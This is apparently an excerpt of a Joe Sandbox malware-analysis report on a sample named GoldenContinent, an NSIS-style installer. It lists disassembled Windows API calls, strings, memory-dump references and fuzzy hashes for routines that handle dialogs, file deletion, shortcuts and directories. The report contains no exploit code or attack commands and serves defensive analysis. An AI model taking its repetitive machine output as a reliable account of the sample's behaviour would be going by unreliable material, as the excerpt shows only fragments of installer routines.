                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00429E6D,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
